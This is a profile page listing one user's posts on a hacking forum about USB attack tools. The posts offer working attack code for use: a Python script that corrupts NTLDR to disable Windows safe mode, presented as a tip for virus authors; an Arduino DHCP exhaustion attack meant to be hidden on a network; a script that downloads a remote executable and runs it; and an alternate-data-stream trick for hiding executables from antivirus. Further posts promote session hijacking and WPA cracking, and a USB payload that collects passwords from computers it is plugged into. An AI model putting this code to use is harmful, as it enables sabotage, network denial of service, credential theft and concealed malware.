sablefoxx
-
Posts
572 -
Joined
-
Last visited
-
Days Won
1
Posts posted by sablefoxx
-
-
@ibegreengoblin -- I sent you a PM, I'd also recommend modifying your post here to be a little less incriminating.
-
Glad to see the project is moving forward. May I humbly suggest adding this little script I wrote recently. Allows you to copy other people's dropbox accounts and maintain access to them even if they change their password. Perfect for flash drives/switchblades!
And if you're feeling a bit evil, disable safe mode (XP/2k3):
# Python 2.x Code import os import mmap def patchNtldr(ntldr = 'C:\\ntldr'): file = open(ntldr, 'r+') size = os.path.getsize(ntldr) map = mmap.mmap(file.fileno(), size) map.seek(1915) # Jump to offset map.write_byte('\x90') # NOP Sled, whee! map.write_byte('\x90') map.write_byte('\x90') map.close() if __name__ == '__main__': patchNtldr()
-
Meterpreter is good at this. -- http://lmgtfy.com/?q=meterpreter+tutorial
-
Yeah that doesn't seem like a very mean virus. You can prbly just boot into safe mode and modify the Group Policies or regkeys to re-gain access.
On a side note to virus authors don't forget to disable safe mode by patching the NTLDR like so:
# Python 2.x Code import os import mmap def patchNtldr(ntldr = 'C:\\ntldr'): file = open(ntldr, 'r+') size = os.path.getsize(ntldr) map = mmap.mmap(file.fileno(), size) map.seek(1915) # Jump to offset map.write_byte('\x90') # NOP Sled, whee! map.write_byte('\x90') map.write_byte('\x90') map.close() if __name__ == '__main__': patchNtldr()
-
DHCP attacks are fun, I recently wrote a Arduino sketch to preform DHCP Exhaustion attacks on (ethernet) networks. Thinking about hiding in a network printer or something.
/*** * Net~nade: The hand held DHCP grenade (exhaustion attack) * Written by: Sablefoxx */ #include <Ethernet.h> #include <EthernetDHCP.h> /* Function Prototypes */ void requestIp(byte); void displayMac(byte); const char* addressToString(const uint8_t* ip); /* Setup */ void setup() { Serial.begin(9600); } /* Main Loop */ void loop() { byte mac[6] = {0xDE, 0xAD, 0xBE, 0xEF, 0x01, 0x01}; for(int hexFour = 0; hexFour < 256; ++hexFour) { for(int hexFive = 0; hexFive < 256; ++hexFive) { requestIp(mac); mac[5]++; hexFive++; EthernetDHCP.maintain(); } mac[4]++; // Incriment 4th hex value mac[5] = 0x01; // Reset 5th hex value hexFour++; // Incriment count } } void requestIp(byte mac[]) { Serial.print("[*] Attempting to obtain DHCP lease..."); EthernetDHCP.begin(mac); const byte* ip = EthernetDHCP.ipAddress(); const byte* gateway = EthernetDHCP.gatewayIpAddress(); Serial.println("got it!"); Serial.print("[+] From "); Serial.print(addressToString(gateway)); Serial.print(" got "); Serial.print(addressToString(ip)); Serial.print(" with "); displayMac(mac); Serial.print("\n"); } void displayMac(byte mac[]) { for(int index; index <= 5; ++index) { Serial.print(mac[index], HEX); if(index < 5) { Serial.print(":"); } } } const char* addressToString(const uint8_t* ip) { static char buf[16]; sprintf(buf, "%d.%d.%d.%d\0", ip[0], ip[1], ip[2], ip[3]); return buf; }
-
You shouldn't make system calls if possible (they're evil), it's actually easy to download files in pure python.
Heres a quick example;
import urllib from subprocess import Popen path = 'C:\\file.exe' # Local path url = 'http://remote-server.com/file.exe' # Remote path connection = urllib.urlopen(url) remoteFile = connection.read() connection.close() try: localFile = open(path, 'w') localFile.write(remoteFile) localFile.close() Popen(path) # Execute whatever "path" points to except IOError: print '***** OMFG ERROR: Location is not writable %s *****\n' % path
Using sys.argv you can even make the 'url' a command line argument.
-
I haven't had much time to develop Py~Blade recently so here is the current source code, it's got a few bugs but feel free to hack it up. This isn't an official release but feel free to post patches, or any cool modifications you guys make. I'll get around to writing some more stuff in the summer (hopefully).
(Go forth and learn python! http://docs.python.org)
-
-
-
It would be interesting to see someone writing an exploit that could tell this function in NoScript to disable HTTPS.
If you could write an exploit to do this you'd already have code running on the machine, which would make it pointless to disable HTTPS because you already owned the box, just hook the encryption dll.
-
1. Facebook sends the cookie in clear-text even if you login via SSL.
2. Gmail is now only done over SSL, no custom settings required, which mitigates this attack somewhat (certain other Google apps are not done over SSL though), but you can just use SSLStrip get around that
Also look into using Hamster/Ferret it can attack all sites and not just a predefined list (and almost as easy to use)
-
I'm hoping not to have to use AV-Kill and instead just hide everything. Killing process is messy and loud and I'd rather focus on stealth. I'm currently looking into hiding executable files in alternate data streams. For those of you who aren't familiar with alternate data streams they work like so;
E:\>touch test.txt E:\>echo hello world >> test.txt E:\>cat test.txt hello world E:\>dir test.txt Volume in drive E is RAID_ARRAY Volume Serial Number is 0000-0000 Directory of E:\ 10/20/2010 10:35 AM 14 test.txt 1 File(s) 14 bytes 0 Dir(s) 7,143,783,653,376 bytes free E:\>touch test.txt:hidden.txt E:\>echo this is the hidden file >> test.txt:hidden.txt E:\>dir test.txt Volume in drive E is RAID_ARRAY Volume Serial Number is 0000-0000 Directory of E:\ 10/20/2010 10:36 AM 14 test.txt 1 File(s) 14 bytes 0 Dir(s) 7,143,783,653,376 bytes free E:\>cat test.txt hello world E:\>cat test.txt:hidden.txt this is the hidden file E:\>
Notice the file size does not change and the file isn't listed using 'dir' and cannot be viewed by enabling hidden/system file viewing. :)
-
(Sorry about the long update interval recently moved 1,784 miles to attend college)
Lots of new features in the upcoming build, plus made the code a lot more modular so it will be easier for kids to play with. No AV kill in the new build at this time, but I will look into the Metasploit kill scripts, thx for the tip.
-
-
-
http://www.wpacracker.com/ (supports .zip files)
-
The website works by using a very large CPU cluster (400 to be exact) to run dictionary attacks against the WPA handshake. Since he is not using rainbow tables (a.k.a. hash tables/time memory trade-off) the salted keys aren't a problem.
-
WPA keys are salted based on the SSID of the access point. All of these tables are based on common SSIDs, so if you have a target in mind you may save a lot of time using; http://www.wpacracker.com/ (which will work on any SSID)
If the access point does have a common SSID you'll want to make sure its included with the tables you download.
-
Firefox (or any web browser for that matter)
-
thanx for tut , but can put file PyBlade on partition "CDFS" and save log on Another Partition , I thing that best because if put file on CDFS cant delete file and the antivirus not scan
and give me some explain about payloads file emo.exe,ftp_exec.exe etc.. what can I do for that
A modified U3 payload is on the way, w1ldf1re is help'in with that.
-
-
From what I now...
-Install F_Bex.u3p opening the U3 menu of an UNMODIFIED Sandisk Cruzer.
-Open the menu...install apps...from Hdd...
and a small icon will appear on the avalaible apps...
My Problem
Couldn't find the "sniffing" log !
:)
Make sure you also copy the PyBlade files onto the flash partition of the drive. 'FBex' merely finds bex.exe and executes it. You can also set FBex to start automatically when the drive is inserted via the U3 menu.
I'm writing up some full documentation it'll be out soon, also w1ldf1re is working on a (modified) U3 version.
-
-
Each time you run bex.exe it should create a new directory called X:\logs\COMPUTERNAME and will generate a set of logs for that computer. If a new directory does not exist there was a problem executing the payload(s).
(if you're looking in X:\logs\VM then you're looking at the log files from the virtual machine I test stuff on which doesn't have any passwords nor programs installed on it)
(in the examples above 'x:' would be your flash drive)
The Attack Pre-Installed Environment
in USB Hacks
Posted · Edited by sablefoxx
are!